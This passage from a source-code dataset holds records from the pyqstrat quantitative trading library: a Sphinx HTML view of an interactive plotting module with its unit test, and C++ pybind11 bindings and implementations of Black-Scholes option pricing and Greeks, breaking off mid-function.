class=\"n\">xcol</span><span class=\"p\">]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ylabel</span> <span class=\"o\">=</span> <span class=\"n\">ycol</span> <span class=\"k\">if</span> <span class=\"n\">ycol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">[</span><span class=\"n\">ycol</span><span class=\"p\">]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zcol</span> <span class=\"o\">=</span> <span class=\"n\">zcol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"n\">xcol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ycol</span> <span class=\"o\">=</span> <span class=\"n\">ycol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">create_selection_widgets_func</span><span class=\"p\">(</span><span class=\"n\">dimensions</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">update</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">update</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"InteractivePlot.update\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.update\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">update</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">owner_idx</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Redraw the form using the values of all widgets above and including the one with index owner_idx.</span>\n<span class=\"sd\"> If owner_idx is -1, we redraw everything.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">select_conditions</span> <span class=\"o\">=</span> <span class=\"p\">[(</span><span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">value</span><span class=\"p\">)</span> <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">widget</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()]</span>\n <span class=\"k\">if</span> <span class=\"n\">owner_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">dim_select_conditions</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">dim_select_conditions</span> <span class=\"o\">=</span> <span class=\"n\">select_conditions</span><span class=\"p\">[:</span><span class=\"n\">owner_idx</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"c1\"># for selecting lower widget options, use value of widgets above </span>\n \n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())[</span><span class=\"n\">owner_idx</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">:]:</span>\n <span class=\"n\">widget</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span>\n <span class=\"n\">widget_options</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">dim_select_conditions</span><span class=\"p\">)</span>\n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;setting values: </span><span class=\"si\">{</span><span class=\"n\">widget_options</span><span class=\"si\">}</span><span class=\"s1\"> on widget: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">options</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">dim_select_conditions</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"n\">owner_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n \n <span class=\"n\">filtered_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">select_conditions</span><span class=\"p\">)</span>\n <span class=\"n\">transformed_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform_func</span><span class=\"p\">(</span><span class=\"n\">filtered_data</span><span class=\"p\">)</span>\n <span class=\"n\">lines</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">stat_func</span><span class=\"p\">(</span><span class=\"n\">transformed_data</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zcol</span><span class=\"p\">)</span>\n <span class=\"n\">plot_widgets</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">plot_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xlabel</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ylabel</span><span class=\"p\">,</span> <span class=\"n\">lines</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_form_func</span><span class=\"p\">(</span><span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">())</span> <span class=\"o\">+</span> <span class=\"n\">plot_widgets</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">)</span></div></div>\n \n \n<span class=\"c1\"># unit tests</span>\n<div class=\"viewcode-block\" id=\"TestInteractivePlot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">TestInteractivePlot</span><span class=\"p\">(</span><span class=\"n\">unittest</span><span class=\"o\">.</span><span class=\"n\">TestCase</span><span class=\"p\">):</span>\n<div class=\"viewcode-block\" id=\"TestInteractivePlot.test_interactive_plot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot.test_interactive_plot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">test_interactive_plot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">):</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">seed</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">)</span>\n <span class=\"n\">size</span> <span class=\"o\">=</span> <span class=\"mi\">1000</span>\n \n <span class=\"n\">dte</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">randint</span><span class=\"p\">(</span><span class=\"mi\">5</span><span class=\"p\">,</span> <span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">put_call</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">choice</span><span class=\"p\">([</span><span class=\"s1\">&#39;put&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;call&#39;</span><span class=\"p\">],</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">year</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">choice</span><span class=\"p\">([</span><span class=\"mi\">2018</span><span class=\"p\">,</span> <span class=\"mi\">2019</span><span class=\"p\">,</span> <span class=\"mi\">2020</span><span class=\"p\">,</span> <span class=\"mi\">2021</span><span class=\"p\">],</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">uniform</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mf\">0.5</span><span class=\"p\">,</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">where</span><span class=\"p\">(</span><span class=\"n\">put_call</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;call&#39;</span><span class=\"p\">,</span> <span class=\"n\">delta</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"n\">delta</span><span class=\"p\">)</span>\n <span class=\"n\">premium</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">abs</span><span class=\"p\">(</span><span class=\"n\">delta</span> <span class=\"o\">*</span> <span class=\"mi\">10</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"n\">dte</span> <span class=\"o\">+</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">normal</span><span class=\"p\">(</span><span class=\"n\">size</span><span class=\"o\">=</span><span class=\"n\">size</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"n\">dte</span> <span class=\"o\">/</span> <span class=\"mi\">10</span>\n <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">({</span><span class=\"s1\">&#39;dte&#39;</span><span class=\"p\">:</span> <span class=\"n\">dte</span><span class=\"p\">,</span> <span class=\"s1\">&#39;put_call&#39;</span><span class=\"p\">:</span> <span class=\"n\">put_call</span><span class=\"p\">,</span> <span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"n\">year</span><span class=\"p\">,</span> <span class=\"s1\">&#39;delta&#39;</span><span class=\"p\">:</span> <span class=\"n\">delta</span><span class=\"p\">,</span> <span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">:</span> <span class=\"n\">premium</span><span class=\"p\">})</span>\n \n <span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"p\">{</span><span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Premium $&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Year&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;dte&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Days to Expiry&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;Delta&#39;</span><span class=\"p\">}</span>\n <span class=\"n\">secy_line_config</span> <span class=\"o\">=</span> <span class=\"n\">LineConfig</span><span class=\"p\">(</span><span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"n\">ip</span> <span class=\"o\">=</span> <span class=\"n\">InteractivePlot</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">,</span> \n <span class=\"n\">labels</span><span class=\"p\">,</span> \n <span class=\"n\">transform_func</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform</span><span class=\"p\">,</span>\n <span class=\"n\">stat_func</span><span class=\"o\">=</span><span class=\"n\">MeanWithCI</span><span class=\"p\">(</span><span class=\"n\">ci_level</span><span class=\"o\">=</span><span class=\"mi\">95</span><span class=\"p\">),</span>\n <span class=\"n\">plot_func</span><span class=\"o\">=</span><span class=\"n\">LineGraphWithDetailDisplay</span><span class=\"p\">(</span><span class=\"n\">line_configs</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;put&#39;</span><span class=\"p\">:</span> <span class=\"n\">secy_line_config</span><span class=\"p\">}),</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"n\">ip</span><span class=\"o\">.</span><span class=\"n\">create_pivot</span><span class=\"p\">(</span><span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;premium&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;put_call&#39;</span><span class=\"p\">,</span> <span class=\"n\">dimensions</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;year&#39;</span><span class=\"p\">:</span> <span class=\"mi\">2018</span><span class=\"p\">,</span> <span class=\"s1\">&#39;dte&#39;</span><span class=\"p\">:</span> <span class=\"kc\">None</span><span class=\"p\">})</span></div>\n \n<div class=\"viewcode-block\" id=\"TestInteractivePlot.transform\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot.transform\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">transform</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">seterr</span><span class=\"p\">(</span><span class=\"s1\">&#39;raise&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"s1\">&#39;delta_rnd&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">percentile_buckets</span><span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">abs</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">delta</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">),</span> <span class=\"mi\">10</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">data</span></div></div>\n \n \n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;__main__&#39;</span><span class=\"p\">:</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span> <span class=\"o\">|</span> <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">ELLIPSIS</span><span class=\"p\">)</span>\n <span class=\"n\">unittest</span><span class=\"o\">.</span><span class=\"n\">main</span><span class=\"p\">(</span><span class=\"n\">argv</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;first-arg-is-ignored&#39;</span><span class=\"p\">],</span> <span class=\"n\">exit</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span>\n <span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s1\">&#39;done&#39;</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n <form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.6917098164558411, "alphanum_fraction": 0.7176165580749512, "avg_line_length": 26.5, "blob_id": "40e49ef3dbd7208912db7fb271b9915dbcbb5cfd", "content_id": "2c8dbb279af6303a2b1bdcb6a5b8bf000dc62179", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 386, "license_type": "permissive", "max_line_length": 85, "num_lines": 14, "path": "/pyqstrat/cpp/options/pybind.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#include <pybind11/pybind11.h>\n\nnamespace py = pybind11;\nusing namespace pybind11::literals;\nusing namespace std;\n\nvoid init_pybind_options(py::module &); //Initialize the black scholes options module\n\nPYBIND11_MODULE(pyqstrat_cpp, m) {\n init_pybind_options(m);\n m.attr(\"__name__\") = \"pyqstrat.pyqstrat_cpp\";\n py::options options;\n options.disable_function_signatures();\n}\n\n" }, { "alpha_fraction": 0.4826427698135376, "alphanum_fraction": 0.5035461187362671, "avg_line_length": 35.35293960571289, "blob_id": "ddb75a6fac5537b4a607222d281ba20b97620fa0", "content_id": "f4ea02f6e9c49bdd4e4b141cdb85358f6214fca6", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8037, "license_type": "permissive", "max_line_length": 139, "num_lines": 221, "path": "/pyqstrat/cpp/options/pybind_options.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n#include <pybind11/chrono.h>\n#include <pybind11/iostream.h>\n#include <pybind11/numpy.h>\n\n#include \"options.hpp\"\n\nnamespace py = pybind11;\nusing namespace pybind11::literals;\n\nvoid init_pybind_options(py::module &m) {\n m.def(\"_pdf\", py::vectorize(pdf), \"x\"_a,\n R\"pqdoc(\n Probability density function of normal distribution\n Args:\n x (float): random variable\n Returns:\n float: pdf of the random variable\n )pqdoc\");\n \n m.def(\"cdf\", py::vectorize(cdf), \"x\"_a,\n R\"pqdoc(\n Cumulative density function of normal distribution\n Args:\n x (float): random variable\n Returns:\n float: cdf of the random variable\n )pqdoc\");\n \n m.def(\"d1\", py::vectorize(d1),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n d1 from Black Scholes\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float): Annualized dividend yield. Use 0.01 for 1%\n Returns:\n float:\n )pqdoc\");\n \n m.def(\"d2\", py::vectorize(d2),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n d2 from Black Scholes\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float): Annualized dividend yield. Use 0.01 for 1%\n Returns:\n float:\n )pqdoc\");\n \n m.def(\"black_scholes_price\", py::vectorize(black_scholes_price),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute Euroepean option price\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option price\n )pqdoc\");\n \n m.def(\"delta\", py::vectorize(delta),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option delta\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option delta\n )pqdoc\");\n \n m.def(\"theta\", py::vectorize(theta),\n \"call\"_a,\n \"F\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option theta per day. This is Black Scholes formula theta divided by 365 to give us the customary theta per day\n Args:\n call (bool): True for a call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option theta\n )pqdoc\");\n \n m.def(\"gamma\", py::vectorize(_gamma),\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option gamma.\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option gamma\n )pqdoc\");\n \n m.def(\"vega\", &vega,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option vega. This is Black Scholes formula vega divided by 100 so we get rho per 1% change in interest rate\n Args:\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option vega\n )pqdoc\");\n \n m.def(\"rho\", py::vectorize(theta),\n \"call\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"sigma\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute European option rho. This is Black Scholes formula rho divided by 100 so we get rho per 1% change in interest rate\n Args:\n call (bool): True for a European call option, False for a put\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n sigma (float): Annualized volatility. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Option theta\n )pqdoc\");\n \n m.def(\"implied_vol\", py::vectorize(implied_vol),\n \"call\"_a,\n \"price\"_a,\n \"S\"_a,\n \"K\"_a,\n \"t\"_a,\n \"r\"_a,\n \"q\"_a = 0.0,\n R\"pqdoc(\n Compute implied volatility for a European option.\n Args:\n call (bool): True for a call option, False for a put\n price (float): The option premium\n S (float): Spot price. For a future discount the future price using exp(-rt)\n K (float): Strike\n t (float): Time to maturity in years\n r (float): Continuously compounded interest rate. Use 0.01 for 1%\n q (float, optional): Annualized dividend yield. Use 0.01 for 1%. Default 0\n Returns:\n float: Implied volatility. For 1% we return 0.01\n )pqdoc\");\n}\n\n\n\n" }, { "alpha_fraction": 0.5381382703781128, "alphanum_fraction": 0.5667157173156738, "avg_line_length": 37.06399917602539, "blob_id": "5bbb863cd7648fd6c587b5c34d30661a22f67d8f", "content_id": "029bde50d709e949872a3eb193af630f78b28c29", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4759, "license_type": "permissive", "max_line_length": 125, "num_lines": 125, "path": "/pyqstrat/cpp/options/options.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//Adaoted from py_vollib black_scholes_merton analytical greeks\n#include <iostream>\n#include <cmath>\n#include <iomanip>\n#include <limits>\n#include \"options.hpp\"\n\nusing namespace std;\n\nconst double PI = 3.14159265358979323846264338327950288; // From M_PI definition\n\n// pdf\ndouble pdf(double x) {\n return ( 1.0 / (sqrt( 2 * PI))) * exp(-0.5 * x * x);\n}\n\n// cdf\ndouble cdf(double x) {\n return std::erfc(-x / std::sqrt(2)) /2;\n}\n\ndouble d1(double S, double K, double t, double r, double sigma, double q) {\n return (log(S / K) + ((r - q)+ 0.5 * sigma * sigma) * t) / (sigma * sqrt(t));\n}\n\ndouble d2(double S, double K, double t, double r, double sigma, double q) {\n return d1(S, K, t, r, sigma, q) - sigma * sqrt(t);\n}\n\ndouble black_scholes_price(bool call, double S, double K, double t, double r, double sigma, double q) {\n if (call) {\n return cdf(d1(S, K, t, r, sigma, q)) * S * exp(-q * t) - cdf(d2(S, K, t, r, sigma, q)) * K * exp(-r * t);\n } else {\n return cdf(-d2(S, K, t, r, sigma, q)) * K * exp(-r * t) - cdf(-d1(S, K, t, r, sigma, q)) * S * exp(-q * t);\n }\n}\n\ndouble delta(bool call, double S, double K, double t, double r, double sigma, double q) {\n double D1 = d1(S, K, t, r, sigma, q);\n if (call)\n return exp(-q * t) * cdf(D1);\n else\n return -exp(-q * t) * cdf(-D1);\n}\n\ndouble theta(bool call, double S, double K, double t, double r, double sigma, double q) {\n // The text book analytical formula does not divide by 365,\n // but in practice theta is defined as the change in price\n // for each day change in t, hence we divide by 365.\n \n double D1 = d1(S, K, t, r, sigma, q);\n double D2 = d2(S, K, t, r, sigma, q);\n double first_term = (S* exp(-q * t) * pdf(D1) * sigma) / (2 * sqrt(t));\n \n if (call) {\n double second_term = -q * S * exp(-q * t) * cdf(D1);\n double third_term = r * K * exp(-r * t) * cdf(D2);\n return - (first_term + second_term + third_term) / 365.0;\n } else {\n double second_term = -q * S * exp(-q * t) * cdf(-D1);\n double third_term = r * K * exp(-r * t) * cdf(-D2);\n return (-first_term + second_term + third_term) / 365.0;\n }\n}\n\ndouble _gamma(double S, double K, double t, double r, double sigma, double q) {\n double D1 = d1(S, K, t, r, sigma, q);\n double numerator = exp(-q * t) * pdf(D1);\n double denominator = S * sigma * sqrt(t);\n return numerator / denominator;\n}\n\ndouble vega(double S, double K, double t, double r, double sigma, double q) {\n //The text book analytical formula does not multiply by .01,\n //but in practice vega is defined as the change in price\n //for each 1 percent change in IV, hence we multiply by 0.01.\n double D1 = d1(S, K, t, r, sigma, q);\n return S * exp(-q * t) * pdf(D1) * sqrt(t) * 